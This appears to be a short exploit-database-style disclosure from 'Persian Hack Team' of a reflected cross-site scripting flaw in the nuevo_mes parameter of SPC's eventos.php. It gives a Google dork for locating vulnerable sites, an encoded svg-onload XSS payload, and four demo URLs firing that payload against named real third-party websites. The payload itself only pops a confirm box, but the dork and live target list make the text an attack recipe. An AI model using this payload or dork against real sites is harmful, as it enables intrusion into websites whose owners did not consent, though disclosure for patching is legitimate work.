######################
# Exploit Title : SPC - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://spc.com.es/
# Google Dork : "SPC" inurl:eventos.php?nuevo_ano=
# Date: 2016/01/30
# Version: V2016
######################
# PoC:
# nuevo_mes=[XSS]
# Payload = '>Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo:
#http://www.delf-dalf.es/eventos.php?primero=5&proximos=1&nuevo_mes=02%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.mundocompresor.com/frontend/mc/eventos.php?primero=0&proximos=1&nuevo_mes=10%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.elpublicista.es/frontend/elpublicista/eventos.php?tipoeve=3&proximos=1&nuevo_mes=01%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.indisa.es/frontend/indisa/eventos.php?proximos=1&nuevo_mes=5%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################